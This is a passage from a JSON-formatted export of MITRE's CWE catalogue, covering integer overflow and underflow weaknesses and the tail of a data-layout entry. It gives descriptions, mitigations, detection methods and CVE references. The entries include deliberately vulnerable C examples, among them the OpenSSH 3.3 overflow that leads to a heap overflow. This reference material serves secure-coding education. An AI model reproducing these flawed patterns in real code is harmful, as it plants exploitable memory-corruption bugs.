Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Memory","Read Memory"],"Note":"Can result in unintended modifications or exposure of sensitive memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"In flat address space situations, never allow computing memory addresses as offsets from another memory address."},{"Phase":"Architecture and Design","Description":"Fully specify protocol layout unambiguously, providing a structured grammar (e.g., a compilable yacc grammar)."},{"Phase":"Testing","Description":"Testing: Test that the implementation properly handles each case in the protocol grammar."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example function, the memory address of variable b is derived by adding 1 to the address of variable a. This derived address is then used to assign the value 0 to b.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void example() {}","xhtml:div":{"#text":"char a;char b;*(&a + 1) = 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"Here, b may not be one byte past a. It may be one byte in front of a. Or, they may have three bytes between them because they are aligned on 32-bit boundaries."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reliance on data layout"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Structure Padding", Page 284"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Reliance on Data Layout","attr":{"@_Date":"2008-04-11"}}}},"190":{"attr":{"@_ID":"190","@_Name":"Integer Overflow or Wraparound","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.","Extended_Description":"An integer overflow or wraparound occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs. This becomes security-critical when the result is used to control looping, make a security decision, or determine the offset or size in behaviors such as memory allocation, copying, concatenation, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000","@_Chain_ID":"680"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Effectiveness":"High"},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Black Box","Description":"Sometimes, evidence of this weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol."},{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","If possible, choose a language or compiler that performs automatic bounds checking."]}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Use libraries or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]"]}},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range.","Use unsigned integers where possible. This makes it easier to perform validation for integer overflows. When signed integers are required, ensure that the range check includes minimum values as well as maximum values."]}},{"attr":{"@_Mitigation_ID":"MIT-36"},"Phase":"Implementation","Description":{"xhtml:p":["Understand the programming language\'s underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]","Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"Intro_Text":"The following code excerpt from OpenSSH 3.3 demonstrates a classic case of integer overflow:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"nresp = packet_get_int();if (nresp > 0) {}","xhtml:br":"","xhtml:div":{"#text":"response = xmalloc(nresp*sizeof(char*));for (i = 0; i < nresp; i++) response[i] = packet_get_string(NULL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0. Most malloc() implementations will happily allocate a 0-byte buffer, causing the subsequent loop iterations to overflow the heap buffer response."},{"Intro_Text":"Integer overflows can be complicated and difficult to detect. The following example is an attempt to show how an integer overflow may lead to undefined looping behavior:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"short int bytesRec = 0;char buf[SOMEBIGNUM];while(bytesRec < MAXGET) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"bytesRec += getFromInput(buf+bytesRec);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"In the above case, it is entirely possible that bytesRec may overflow, continuously creating a lower number than MAXGET and also overwriting the first MAXGET-1 bytes of buf."},{"Intro_Text":"In this example the method determineFirstQuarterRevenue is used to determine the first quarter revenue for an accounting/business application. The method retrieves the monthly sales totals for the first three months of the year, calculates the first quarter sales totals from the monthly sales totals, calculates the first quarter revenue based on the first quarter sales, and finally saves the first quarter revenue results to the database.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define JAN 1#define FEB 2#define MAR 3short getMonthlySales(int month) {...}float calculateRevenueForQuarter(short quarterSold) {...}int determineFirstQuarterRevenue() {}","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"float quarterRevenue = 0.0f;short JanSold = getMonthlySales(JAN); /* Get sales in January */short FebSold = getMonthlySales(FEB); /* Get sales in February */short MarSold = getMonthlySales(MAR); /* Get sales in March */short quarterSold = JanSold + FebSold + MarSold;quarterRevenue = calculateRevenueForQuarter(quarterSold);saveFirstQuarterRevenue(quarterRevenue);return 0;","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// Variable for sales revenue for the quarter","// Calculate quarterly total","// Calculate the total revenue for the quarter"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...float calculateRevenueForQuarter(long quarterSold) {...}int determineFirstQuarterRevenue() {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...long quarterSold = JanSold + FebSold + MarSold;quarterRevenue = calculateRevenueForQuarter(quarterSold);...","xhtml:br":["","","","","","",""],"xhtml:i":["// Calculate quarterly total","// Calculate the total revenue for the quarter"]}}}}],"Body_Text":["However, in this example the primitive type short int is used for both the monthly and the quarterly sales variables. In C the short int primitive type has a maximum value of 32768. This creates a potential integer overflow if the value for the three monthly sales adds up to more than the maximum value for the short int primitive type. An integer overflow can lead to data corruption, unexpected behavior, infinite loops and system crashes. To correct the situation the appropriate primitive type should be used, as in the example below, and/or provide some validation mechanism to ensure that the maximum value for the primitive type is not exceeded.","Note that an integer overflow could also occur if the quarterSold variable has a primitive type long but the method calculateRevenueForQuarter has a parameter of type short."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"},{"Reference":"CVE-2010-2753","Description":"Chain: integer overflow leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753"},{"Reference":"CVE-2005-1513","Description":"Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513"},{"Reference":"CVE-2002-0391","Description":"Integer overflow via a large number of arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0391"},{"Reference":"CVE-2002-0639","Description":"Integer overflow in OpenSSH as listed in the demonstrative examples.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639"},{"Reference":"CVE-2005-1141","Description":"Image with large width and height leads to integer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1141"},{"Reference":"CVE-2005-0102","Description":"Length value of -1 leads to allocation of 0 bytes and resultant heap overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0102"},{"Reference":"CVE-2004-2013","Description":"Length value of -1 leads to allocation of 0 bytes and resultant heap overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2013"},{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"}]},"Functional_Areas":{"Functional_Area":["Number Processing","Memory Management","Counters"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Integer overflow (wrap or wraparound)"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Integer Overflow"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Integer overflow"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT18-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT35-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM07-C","Entry_Name":"Ensure that the arguments to calloc(), when multiplied, do not wrap","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":3,"Entry_Name":"Integer Overflows"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-145"}},{"attr":{"@_External_Reference_ID":"REF-146"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, "Integer Overflows" Page 620"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 7: Integer Overflows." Page 119"}},{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-150"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Signed Integer Boundaries", Page 220"}}]},"Notes":{"Note":[{"#text":"Integer overflows can be primary to buffer overflows.","attr":{"@_Type":"Relationship"}},{"#text":"\\"Integer overflow\\" is sometimes used to cover several types of errors, including signedness errors, or buffer overflows that involve manipulation of integer data types instead of characters. Part of the confusion results from the fact that 0xffffffff is -1 in a signed context. Other confusion also arises because of the role that integer overflows have in chains.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Functional_Areas, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Functional_Areas, Observed_Examples, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Integer Overflow (Wrap or Wraparound)","attr":{"@_Date":"2009-01-12"}}}},"191":{"attr":{"@_ID":"191","@_Name":"Integer Underflow (Wrap or Wraparound)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.","Extended_Description":"This can happen in signed and unsigned cases.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Integer underflow","Description":{"xhtml:p":["\\"Integer underflow\\" is sometimes used to identify signedness errors in which an originally positive number becomes negative as a result of subtraction. However, there are cases of bad subtraction in which unsigned integers are involved, so it\'s not always a signedness issue.","\\"Integer underflow\\" is occasionally used to describe array index errors in which the index is negative."]}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example subtracts from a 32 bit signed integer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>#include <stdbool.h>main (void){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"int i;i = -2147483648;i = i - 1;return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"The example has an integer underflow. The value of i is already at the lowest negative value possible, so after subtracting 1, the new value of i is 2147483647."},{"attr":{"@_Demonstrative_Example_ID":"DX-137"},"Intro_Text":"This code performs a stack allocation based on a length calculation.","Example_Code":{"#text":"}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int a = 5, b = 6;size_t len = a - b;char buf[len]; // Just blows up the stack","xhtml:br":["",""]}},"Body_Text":["Since a and b are declared as signed ints, the \\"a - b\\" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer\'s memory space.","Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker\'s input to attain the negative value."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0816","Description":"Integer underflow in firewall via malformed packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0816"},{"Reference":"CVE-2004-1002","Description":"Integer underflow by packet with invalid length.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1002"},{"Reference":"CVE-2005-0199","Description":"Long input causes incorrect length calculation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0199"},{"Reference":"CVE-2005-1891","Description":"Malformed icon causes integer underflow in loop counter variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1891"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Integer underflow (wrap or wraparound)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 7: Integer Overflows." Page 119"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example"},{"Modification_Name":"CWE Content 